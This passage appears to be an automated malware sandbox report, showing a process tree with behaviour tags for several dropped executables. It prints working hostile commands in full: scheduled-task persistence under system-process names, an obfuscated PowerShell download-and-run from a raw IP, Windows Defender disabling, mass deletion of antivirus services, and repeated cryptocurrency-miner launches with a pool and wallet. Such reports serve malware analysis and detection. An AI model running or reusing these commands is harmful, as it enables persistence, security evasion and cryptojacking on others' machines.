                                                                                                                                                                            schtasks.exe /create /tn "II6Xh9keHIjUF7oPARKeEJUR" /sc ONLOGON /tr "'C:\Windows\Registration\CRMLog\II6Xh9keHIjUF7oPARKeEJUR.exe'" /rl HIGHEST /f
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                            PID:5820
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\winrsmgr\WerFault.exe'" /rl HIGHEST /f
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                            PID:7144
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                            PID:6592
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SysWOW64\advpack\cmd.exe'" /rl HIGHEST /f
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                            PID:6216
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                            PID:3652
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Boot\de-DE\WerFault.exe'" /rl HIGHEST /f
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                            PID:6880
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8C6D.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\8C6D.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5996
                                                                                                                                                                              • C:\ProgramData\Runtimebroker.exe
                                                                                                                                                                                "C:\ProgramData\Runtimebroker.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                PID:5236
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91''+''.241''+''.19''+''.52/Ru''+''nt''+''im''+''ebr''+''oke''+''r.exe''),(''Vpnm.''+''e''+''xe''));Start-Process (''V''+''p''+''nm.exe'')'
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                  PID:3252
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "powershell" Get-MpPreference -verbose
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:5064
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:5468
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1076
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:6560
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4360
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1408
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4212
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:6992
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:7320
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:7600
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:7924
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:7288
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4236
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9056.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9056.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      PID:4488
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9056.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\9056.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4528
                                                                                                                                                                                                      • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                        C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:764
                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                          PID:6724
                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                          schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\pwcreator\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:4928
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\B6CB.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\B6CB.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:4396
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Forgesoft\FSU Admin Center\fsucenter.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Forgesoft\FSU Admin Center\fsucenter.exe"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            PID:5996
                                                                                                                                                                                                            • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                              -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5276
                                                                                                                                                                                                              • C:\ProgramData\Systemd\HostData.exe
                                                                                                                                                                                                                NULL
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4244
                                                                                                                                                                                                                • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                  -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:7464
                                                                                                                                                                                                                  • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                    -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:6648
                                                                                                                                                                                                                    • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                      -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:7064
                                                                                                                                                                                                                      • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                        -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:5632
                                                                                                                                                                                                                        • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                          -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:7640
                                                                                                                                                                                                                          • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                            -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:7536
                                                                                                                                                                                                                            • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                              -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:7612
                                                                                                                                                                                                                              • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:7676
                                                                                                                                                                                                                                • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                  -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:7544
                                                                                                                                                                                                                                  • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                    -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:2008
                                                                                                                                                                                                                                    • C:\ProgramData\Data\Database.exe
                                                                                                                                                                                                                                      -a kawpow -o rvn.2miners.com:6060 -u RTfmeoZ3bbRWNuyicTPTPyYHU64km4wcMA.rig -p x
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:6072
                                                                                                                                                                                                                                    • C:\ProgramData\Data\Database.exe
